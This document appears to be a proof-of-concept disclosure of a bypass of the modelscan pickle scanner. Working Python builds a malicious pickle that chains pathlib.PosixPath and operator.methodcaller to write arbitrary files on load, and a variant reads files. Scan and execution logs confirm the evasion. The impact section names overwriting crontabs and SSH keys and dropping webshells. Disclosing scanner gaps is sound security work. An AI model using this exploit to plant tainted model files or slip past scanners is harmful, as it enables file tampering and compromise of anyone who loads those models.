# Modelscan Bypass PoC: pathlib.PosixPath.write_text
## Summary
This pickle file bypasses ProtectAI's modelscan scanner and achieves **arbitrary file write** when loaded with `pickle.load()` or `torch.load()`.
## Technique
The payload combines `pathlib.PosixPath` with `operator.methodcaller("write_text", ...)` to write arbitrary content to any file path. Neither `pathlib` nor `operator.methodcaller` appears in modelscan's `unsafe_globals` blocklist.
**Chain:** the pickle reconstructs `operator.methodcaller("write_text", "<content>")` and invokes it on `pathlib.PosixPath("<target_path>")`, which is equivalent to calling `PosixPath("<target_path>").write_text("<content>")`.
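A minimal sketch of how such a pickle could be generated (the `Payload` class name is illustrative; the payload here is benign and just writes the marker file from the execution log below):

```python
import operator
import pathlib
import pickle

class Payload:
    # __reduce__ makes pickle serialize this object as a deferred call:
    #   operator.methodcaller("write_text", ...)(PosixPath("/tmp/pwned_pathlib.txt"))
    # Both globals involved (operator.methodcaller, pathlib.PosixPath) are
    # picklable and, per the blocklist gaps below, are not flagged by modelscan.
    def __reduce__(self):
        return (
            operator.methodcaller("write_text", "PWNED_VIA_PATHLIB"),
            (pathlib.PosixPath("/tmp/pwned_pathlib.txt"),),
        )

with open("model.pkl", "wb") as f:
    pickle.dump(Payload(), f)
```

Loading `model.pkl` with `pickle.load()` (or `torch.load()`, which uses pickle under the hood) triggers the `write_text` call.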
## Scan Result
```
$ modelscan scan -p model.pkl
No issues found! 🎉
```
## Execution Result
```
$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB
```
## Impact
Arbitrary file write: can overwrite config files, crontabs, SSH `authorized_keys` files, or drop webshells. Combined with `pathlib.PosixPath.read_text` (via a second `methodcaller`), the same gap also enables arbitrary file read.
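The read-side variant can be sketched the same way; here `ReadPayload` and the demo file path are illustrative, and the point is that `pickle.loads()` returns the target file's contents as the "deserialized model":

```python
import operator
import pathlib
import pickle
import tempfile

# Demo setup: create a file standing in for a sensitive target.
secret_path = pathlib.PosixPath(tempfile.gettempdir()) / "secret_demo.txt"
secret_path.write_text("top-secret")

class ReadPayload:
    # On load, pickle evaluates methodcaller("read_text")(secret_path),
    # so the file's contents become the object returned by pickle.loads().
    def __reduce__(self):
        return (operator.methodcaller("read_text"), (secret_path,))

blob = pickle.dumps(ReadPayload())
print(pickle.loads(blob))  # -> top-secret
```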
## Blocklist Gaps
1. `pathlib` module β€” entirely missing from `unsafe_globals`
2. `operator.methodcaller` β€” not blocked (only `operator.attrgetter` is listed)